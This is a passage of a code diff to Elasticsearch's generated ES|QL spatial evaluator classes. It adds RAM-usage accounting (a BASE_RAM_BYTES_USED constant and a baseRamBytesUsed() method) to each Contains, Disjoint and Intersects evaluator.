*/ public final class SpatialContainsGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java index 83a927517b0db..dfad6c954aab1 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java index 87e58c8320ea2..89096f2328367 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialContainsGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java index 61302b49d2564..641a93bb0a11e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java index c09daa0f3f8d3..7332fedfb8bbf 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java index ac8c63a11ebbe..2047368567dfc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java index 77fae3ea04b23..063a8390526ab 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java index acba535905292..7ed07d00b18ac 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java index a600b69f1ec34..d71472c4bebc6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java index c3f535e9b2dad..77388c207ba52 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java index b1d849749af60..d7bf9820e487c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialDisjointGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialDisjointGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java index f85521e790f93..136078ac482fe 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java index 3575f6a4130ce..47c6d756caa0f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java index 02ad8b8e95c5f..23cd3ba1a1f19 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SpatialIntersectsCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java index 8d277443653ae..26649a35b56d8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
  */
 public final class SpatialIntersectsCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsCartesianSourceAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -51,6 +54,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    baseRamBytesUsed += right.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java
index 861bc6a7d8f91..392a53d92de7d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.java
@@ -9,6 +9,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.geo.Component2D;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialIntersectsGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoPointDocValuesAndConstantEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += left.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public BooleanBlock eval(int positionCount, LongBlock leftBlock) {
     try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java
index 5b428fec29a5b..de9cd1a3c8cba 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BytesRefBlock;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class SpatialIntersectsGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialIntersectsGeoPointDocValuesAndSourceEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator left;
